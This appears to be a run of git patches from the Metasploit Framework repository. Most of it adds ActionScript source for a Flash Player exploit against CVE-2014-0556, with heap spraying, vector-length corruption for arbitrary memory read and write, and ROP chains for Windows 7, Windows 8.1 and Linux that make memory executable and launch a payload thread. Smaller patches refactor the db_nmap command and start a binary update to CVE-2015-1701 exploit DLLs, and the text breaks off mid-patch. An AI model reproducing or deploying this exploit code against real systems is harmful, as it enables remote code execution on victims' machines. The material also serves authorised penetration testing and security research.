+
+			for (i = 0; i < bv.length; i++)
+				if (i % 2 == 0) bv[i] = null
+
+			for (i = 0; i < ov.length; i++) {
+				ov[i] = new Vector.<uint>(1022)
+                ov[i][0] = 0xdeadbeef
+			}
+		    
+			bd.copyPixelsToByteArray(new Rectangle(0, 0, 128, 16), bv[6401])
+			
+			for (i = 0; i < ov.length ; i++) {
+				if (ov[i].length == 0xffffffff) {
+                    uv = ov[i]
+                    uv[0] = 0xdeadbeef
+                    uv[1] = 0xdeedbeef
+                    for(var j:uint = 0; j < 4096; j++) {
+                        if (uv[j] == 1022 && uv[j + 2] == 0xdeadbeef) {
+                            uv[0x3fffffff] = uv[j + 1]
+                            break
+                        }
+                    } 
+                } else {
+                    ov[i] = null
+                }
+            }
+            
+            for (i = 0; i < bv.length; i++) {
+                bv[i] = null
+            }
+
+            exploiter = new Exploiter(this, platform, os, payload, uv)
+		}
+		
+	}
+}
diff --git a/external/source/exploits/CVE-2014-0556/ExploitByteArray.as b/external/source/exploits/CVE-2014-0556/ExploitByteArray.as
new file mode 100644
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0556/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0556/ExploitVector.as b/external/source/exploits/CVE-2014-0556/ExploitVector.as
new file mode 100644
index 0000000000..fe25df3aac
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0556/ExploitVector.as
@@ -0,0 +1,74 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint = 0x3fe 
+        
+        public function ExploitVector(v:Vector.<uint>)
+        {
+            uv = v
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0556/Exploiter.as b/external/source/exploits/CVE-2014-0556/Exploiter.as
new file mode 100644
index 0000000000..b371c51895
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0556/Exploiter.as
@@ -0,0 +1,399 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(89698)
+
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+                spray[i][0] = eba.ba
+                spray[i][1] = exploit 
+                spray[i][2] = stack
+                spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0x8000)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0556/Logger.as b/external/source/exploits/CVE-2014-0556/Logger.as
new file mode 100644
index 0000000000..16c0447973
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0556/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 0
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0556/PE.as b/external/source/exploits/CVE-2014-0556/PE.as
new file mode 100644
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0556/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}

From a53a68cfc204d8892bbe702eb9b26e3cba4dfce6 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 4 Jun 2015 18:40:19 -0500
Subject: [PATCH 0318/1013] Refactor db_nmap and fix the save option

---
 lib/msf/ui/console/command_dispatcher/db.rb | 90 ++++++++-------------
 1 file changed, 35 insertions(+), 55 deletions(-)

diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index e72ae5624e..02f6356cf0 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -14,10 +14,6 @@ class Db
   require 'tempfile'
 
   include Msf::Ui::Console::CommandDispatcher
-
-  # TODO: Not thrilled about including this entire module for just store_local.
-  include Msf::Auxiliary::Report
-
   include Metasploit::Credential::Creation
 
   #
@@ -1752,15 +1748,14 @@ class Db
     return unless active?
   ::ActiveRecord::Base.connection_pool.with_connection {
     if (args.length == 0)
-      print_status("Usage: db_nmap [nmap options]")
+      print_status("Usage: db_nmap [--save | [--help | -h]] [nmap options]")
       return
     end
-    save = false
     arguments = []
     while (arg = args.shift)
       case arg
-      when 'save'
-        save = active?
+      when '--save'
+        save = true
       when '--help', '-h'
         cmd_db_nmap_help
         return
@@ -1778,55 +1773,47 @@ class Db
       return
     end
 
-    fd = Tempfile.new('dbnmap')
-    fd.binmode
-
-    fo = Tempfile.new('dbnmap')
-    fo.binmode
-
-    # When executing native Nmap in Cygwin, expand the Cygwin path to a Win32 path
-    if(Rex::Compat.is_cygwin and nmap =~ /cygdrive/)
-      # Custom function needed because cygpath breaks on 8.3 dirs
-      tout = Rex::Compat.cygwin_to_win32(fd.path)
-      fout = Rex::Compat.cygwin_to_win32(fo.path)
-      arguments.push('-oX', tout)
-      arguments.push('-oN', fout)
-    else
-      arguments.push('-oX', fd.path)
-      arguments.push('-oN', fo.path)
-    end
+    fd = Rex::Quickfile.new(['msf-db-nmap-', '.xml'], Msf::Config.local_directory)
 
     begin
-      nmap_pipe = ::Open3::popen3([nmap, 'nmap'], *arguments)
-      temp_nmap_threads = []
-      temp_nmap_threads << framework.threads.spawn("db_nmap-Stdout", false, nmap_pipe[1]) do |np_1|
-        np_1.each_line do |nmap_out|
-          next if nmap_out.strip.empty?
-          print_status("Nmap: #{nmap_out.strip}")
-        end
+      # When executing native Nmap in Cygwin, expand the Cygwin path to a Win32 path
+      if(Rex::Compat.is_cygwin and nmap =~ /cygdrive/)
+        # Custom function needed because cygpath breaks on 8.3 dirs
+        tout = Rex::Compat.cygwin_to_win32(fd.path)
+        arguments.push('-oX', tout)
+      else
+        arguments.push('-oX', fd.path)
       end
 
-      temp_nmap_threads << framework.threads.spawn("db_nmap-Stderr", false, nmap_pipe[2]) do |np_2|
-        np_2.each_line do |nmap_err|
-          next if nmap_err.strip.empty?
-          print_status("Nmap: '#{nmap_err.strip}'")
+      begin
+        nmap_pipe = ::Open3::popen3([nmap, 'nmap'], *arguments)
+        temp_nmap_threads = []
+        temp_nmap_threads << framework.threads.spawn("db_nmap-Stdout", false, nmap_pipe[1]) do |np_1|
+          np_1.each_line do |nmap_out|
+            next if nmap_out.strip.empty?
+            print_status("Nmap: #{nmap_out.strip}")
+          end
         end
+
+        temp_nmap_threads << framework.threads.spawn("db_nmap-Stderr", false, nmap_pipe[2]) do |np_2|
+          np_2.each_line do |nmap_err|
+            next if nmap_err.strip.empty?
+            print_status("Nmap: '#{nmap_err.strip}'")
+          end
+        end
+
+        temp_nmap_threads.map {|t| t.join rescue nil}
+        nmap_pipe.each {|p| p.close rescue nil}
+      rescue ::IOError
       end
 
-      temp_nmap_threads.map {|t| t.join rescue nil}
-      nmap_pipe.each {|p| p.close rescue nil}
-    rescue ::IOError
-    end
+      framework.db.import_nmap_xml_file(:filename => fd.path)
 
-    fo.close(true)
-    framework.db.import_nmap_xml_file(:filename => fd.path)
-
-    if save
-      fd.rewind
-      saved_path = report_store_local("nmap.scan.xml", "text/xml", fd.read, "nmap_#{Time.now.utc.to_i}")
-      print_status("Saved NMAP XML results to #{saved_path}")
+      print_status("Saved NMAP XML results to #{fd.path}") if save
+    ensure
+      fd.close
+      fd.unlink unless save
     end
-    fd.close(true)
   }
   end
 
@@ -1869,13 +1856,6 @@ class Db
     tabs
   end
 
-  #
-  # Store some locally-generated data as a file, similiar to store_loot.
-  #
-  def report_store_local(ltype=nil, ctype=nil, data=nil, filename=nil)
-    store_local(ltype,ctype,data,filename)
-  end
-
   #
   # Database management
   #

From c003602993f036f452ebc278b3b9292eb257fc92 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 4 Jun 2015 18:54:15 -0500
Subject: [PATCH 0319/1013] Remove report_store_local from the spec

---
 spec/lib/msf/ui/console/command_dispatcher/db_spec.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
index 973ec19c8b..530ed1d55d 100644
--- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
+++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
@@ -61,7 +61,6 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
   it { is_expected.to respond_to :each_host_range_chunk }
   it { is_expected.to respond_to :make_sortable }
   it { is_expected.to respond_to :name }
-  it { is_expected.to respond_to :report_store_local }
   it { is_expected.to respond_to :set_rhosts_from_addrs }
 
   describe "#cmd_creds" do

From b291d41b76640e0f4243c80450344d73d6a4623c Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 5 Jun 2015 13:19:41 +1000
Subject: [PATCH 0320/1013] Quick hack to remove hard-coded offsets

---
 .../CVE-2015-1701/cve-2015-1701.x64.dll       | Bin 84992 -> 84992 bytes
 .../CVE-2015-1701/cve-2015-1701.x86.dll       | Bin 72192 -> 72192 bytes
 .../cve-2015-1701/cve-2015-1701.c             |  59 ++++++++++++++----
 3 files changed, 48 insertions(+), 11 deletions(-)

diff --git a/data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll b/data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll
index 01af30b5a008ce3c02cbeef70e2f3bb5317b7b92..e049e41ec77c819496d5a1d2ccaaae216d5f11af 100755
GIT binary patch
delta 22052
zcmeI4dt6n;{`c3~uyu3U0?OvDqJrWbMHIyg2<k$?$h=URlD8-=QNhr(jiCi@DRN3U
zU9mhx=`jjZG)uf3!OKasPGMKNo^5uaPNzdz?dLOVKAYcpp4anwJ%9XO&ws!Da{SEu
z`~A+WwPt3mH8X4|t+AHYSgSgHM#mLCa=o`Dp|6P2NBFE>rHfhmaKHNDx^}asX@O#^
zKEM)V6(=nH^<Z&UAE!Smbju+9Au-r;j~>&o$I{eIe_br~8>&An9`YNm-yx3qCF#ix
z9ex}2fz7C5d`i%^=b=Vrc3kXHUtQBYjt?3&&DFBKDQMeHc!Vn;+PTz<5Z9^*kE0My
z!_|`QI+b+U<G2NsSvf;Dizi)9`oQB@V+M2>+nb7RGAbSAubc74P`AesDqWS1O4Ia~
z;qzCc!WukT$02_`ETi5sDkmm*9A8S<{y|Zw$6-MU9Lg{0GLGqSd~;ZY2F4A(a3Sp`
zqwJelqtc#%x>Sjz59A?lK>btHAw7-<#FD@P`chFAnBn}aV_MSXob6|e95Y?MmyELZ
z4kPtsQ9zdGWKQa(b=Q)bPR*|Hz0`;X&`w=2KZfhHQIQw1Kpx3upMQg{8D;r4`Cl-u
zBG=||ygE_WT%FsSN~Rf=bK_Eu_@c1K@ub%}(r{(RC3+kUFl5Vois5SWIQ|SYJ?Td@
